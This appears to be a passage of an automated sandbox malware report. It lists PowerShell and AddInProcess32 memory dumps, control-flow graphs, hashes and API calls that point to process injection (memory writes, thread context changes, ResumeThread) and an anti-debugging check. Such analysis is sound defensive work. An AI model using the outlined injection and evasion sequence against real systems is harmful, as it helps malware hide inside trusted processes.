                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.1507790413.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffaac390000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.1507790413.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffaac390000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Execution Graph

                                                                          Execution Coverage:6.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:18
                                                                          Total number of Limit Nodes:2

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Execution Graph

                                                                          Execution Coverage:8.9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:21.4%
                                                                          Total number of Nodes:14
                                                                          Total number of Limit Nodes:2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 029370E7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552618466.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_2930000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 633fd902fc517831e319e30eb80ba44133284ff177f467b0543052fef320bbb7
                                                                          • Instruction ID: 87977b3acc81b8935abfefd4ea29ef3e7e7388cd9da55b7f41fc31e00e6a005f
                                                                          • Opcode Fuzzy Hash: 633fd902fc517831e319e30eb80ba44133284ff177f467b0543052fef320bbb7
                                                                          • Instruction Fuzzy Hash: 052157B2C01259CFDB14CFAAD884BEEFBF4AF48224F14841AE459A3350C738A944CF65

Control-flow Graph (rendered image; legend: Executed / Not Executed)
• Blocks: 639a6e2-639a777 (GetCurrentProcess); 639a779-639a77f; 639a780-639a7b4 (GetCurrentThread); 639a7bd-639a7f1 (GetCurrentProcess); 639a7b6-639a7bc; 639a7fa-639a815 (call 639a8b8); 639a7f3-639a7f9; 639a81b-639a84a (GetCurrentThreadId); 639a84c-639a852; 639a853-639a8b5
• Edges: 639a6e2-639a777 -> 639a779-639a77f; 639a6e2-639a777 -> 639a780-639a7b4; 639a779-639a77f -> 639a780-639a7b4; 639a780-639a7b4 -> 639a7bd-639a7f1; 639a780-639a7b4 -> 639a7b6-639a7bc; 639a7bd-639a7f1 -> 639a7fa-639a815; 639a7bd-639a7f1 -> 639a7f3-639a7f9; 639a7b6-639a7bc -> 639a7bd-639a7f1; 639a7fa-639a815 -> 639a81b-639a84a; 639a7f3-639a7f9 -> 639a7fa-639a815; 639a81b-639a84a -> 639a84c-639a852; 639a81b-639a84a -> 639a853-639a8b5; 639a84c-639a852 -> 639a853-639a8b5
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A766
                                                                          • GetCurrentThread.KERNEL32 ref: 0639A7A3
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A7E0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0639A839
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 60860229c91a13380341900520ad142550f750e9d4ef65e231b3f1543dd30a3a
                                                                          • Instruction ID: ad571055b671e2e3074c646477bc42eb2e89ba67ca862d9654ff0e5722b358dd
                                                                          • Opcode Fuzzy Hash: 60860229c91a13380341900520ad142550f750e9d4ef65e231b3f1543dd30a3a
                                                                          • Instruction Fuzzy Hash: 7E5135B4D003098FDB64CFAAD948BAEBBF1BB48314F208159E409A7350D734A944CFA5

Control-flow Graph (rendered image; legend: Executed / Not Executed)
• Blocks: 639a6e8-639a777 (GetCurrentProcess); 639a779-639a77f; 639a780-639a7b4 (GetCurrentThread); 639a7bd-639a7f1 (GetCurrentProcess); 639a7b6-639a7bc; 639a7fa-639a815 (call 639a8b8); 639a7f3-639a7f9; 639a81b-639a84a (GetCurrentThreadId); 639a84c-639a852; 639a853-639a8b5
• Edges: 639a6e8-639a777 -> 639a779-639a77f; 639a6e8-639a777 -> 639a780-639a7b4; 639a779-639a77f -> 639a780-639a7b4; 639a780-639a7b4 -> 639a7bd-639a7f1; 639a780-639a7b4 -> 639a7b6-639a7bc; 639a7bd-639a7f1 -> 639a7fa-639a815; 639a7bd-639a7f1 -> 639a7f3-639a7f9; 639a7b6-639a7bc -> 639a7bd-639a7f1; 639a7fa-639a815 -> 639a81b-639a84a; 639a7f3-639a7f9 -> 639a7fa-639a815; 639a81b-639a84a -> 639a84c-639a852; 639a81b-639a84a -> 639a853-639a8b5; 639a84c-639a852 -> 639a853-639a8b5
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A766
                                                                          • GetCurrentThread.KERNEL32 ref: 0639A7A3
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A7E0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0639A839
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: c46f5bcdc27c5892740c3a9d375e8e6365d2adea95b2e70e51c9e86fd91a2f8a
                                                                          • Instruction ID: a0008992124a74bd6f7f8bb00bf95e87b6c823a00c8923a33cdc66d8bf146de1
                                                                          • Opcode Fuzzy Hash: c46f5bcdc27c5892740c3a9d375e8e6365d2adea95b2e70e51c9e86fd91a2f8a
                                                                          • Instruction Fuzzy Hash: 2A5144B4D003098FDB64CFAAD948BAEBBF1BB48314F208159E409A7360D734A944CFA5

Control-flow Graph (rendered image; legend: Executed / Not Executed)
• Blocks: 293706a-29370f4 (CheckRemoteDebuggerPresent); 29370f6-29370fc; 29370fd-2937138
• Edges: 293706a-29370f4 -> 29370f6-29370fc; 293706a-29370f4 -> 29370fd-2937138; 29370f6-29370fc -> 29370fd-2937138
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 029370E7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552618466.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_2930000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 7bf33643ffa5f47ce2a5ffaa91e31bdd14b3c267d9a8c63dffd0d5a2a7cc951a
                                                                          • Instruction ID: 2b3c3ad525ebb8bba875deb986ed577285c9cc0d0e04cf207468688579d4c52d
                                                                          • Opcode Fuzzy Hash: 7bf33643ffa5f47ce2a5ffaa91e31bdd14b3c267d9a8c63dffd0d5a2a7cc951a
                                                                          • Instruction Fuzzy Hash: 992178B2C01259CFDB14CFAAD484BEEFBF4EF48214F14842AE459A3240C7389945CF65

Control-flow Graph (rendered image; legend: Executed / Not Executed)
• Blocks: 639a928-639a9c4 (DuplicateHandle); 639a9cd-639a9ea; 639a9c6-639a9cc
• Edges: 639a928-639a9c4 -> 639a9cd-639a9ea; 639a928-639a9c4 -> 639a9c6-639a9cc; 639a9c6-639a9cc -> 639a9cd-639a9ea
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639A9B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 37dbbe0f64e2d4e915771cdcbdd5de361b4b3898cd37f71c4f7092f2a4a32c0a
                                                                          • Instruction ID: 7213e54f5806dd98310a9e8a0722d453cf7daa10ee500a9fc67c58d3b80de886
                                                                          • Opcode Fuzzy Hash: 37dbbe0f64e2d4e915771cdcbdd5de361b4b3898cd37f71c4f7092f2a4a32c0a
                                                                          • Instruction Fuzzy Hash: 092100B5C00208DFDB10CFAAD984AEEBBF4FB48310F14841AE918A3350C339A944CFA5

Control-flow Graph (rendered image; legend: Executed / Not Executed)
• Blocks: 639a930-639a9c4 (DuplicateHandle); 639a9cd-639a9ea; 639a9c6-639a9cc
• Edges: 639a930-639a9c4 -> 639a9cd-639a9ea; 639a930-639a9c4 -> 639a9c6-639a9cc; 639a9c6-639a9cc -> 639a9cd-639a9ea
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639A9B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 2e6088691b97830554048a0a3646c2dd512f34b3e7dbfb1e7cd188d4d1772e00
                                                                          • Instruction ID: aae0b58de25ce067993f3cb51e805528dec1fe5bc0b6ea8ea2334c7fe3c1a57f
                                                                          • Opcode Fuzzy Hash: 2e6088691b97830554048a0a3646c2dd512f34b3e7dbfb1e7cd188d4d1772e00
                                                                          • Instruction Fuzzy Hash: DB21E4B5D002489FDB10CFAAD984ADEBBF4FB48310F14841AE918A3350C375A944CFA5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552215830.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_10bd000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa7f8ffa709c9f90187e95a879c5201c1aa339593dffe684c310ee956c44d31b
                                                                          • Instruction ID: e9a05d068b79e0fa8a68d734bb4ee4a5203e31f5bbcb0108640f3ac491922095
                                                                          • Opcode Fuzzy Hash: aa7f8ffa709c9f90187e95a879c5201c1aa339593dffe684c310ee956c44d31b
                                                                          • Instruction Fuzzy Hash: 74210371514300DFDB15DFA4D5C0B56FBA1EB84318F20C5ADE98A0B242C336D447CB61
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552215830.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_10bd000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2169ae53783e6a80d16d16c669b75315598f3801e65c75d6c86cca7f4e3dd85d
                                                                          • Instruction ID: 2906af2783c34aa55a1d7090b29d319a5bf986bcf29f4288286e1b6716857a81
                                                                          • Opcode Fuzzy Hash: 2169ae53783e6a80d16d16c669b75315598f3801e65c75d6c86cca7f4e3dd85d
                                                                          • Instruction Fuzzy Hash: 052141755083809FCB12CF64D994711BFB1EB46214F28C5DAD8898F6A7C33A9856CB62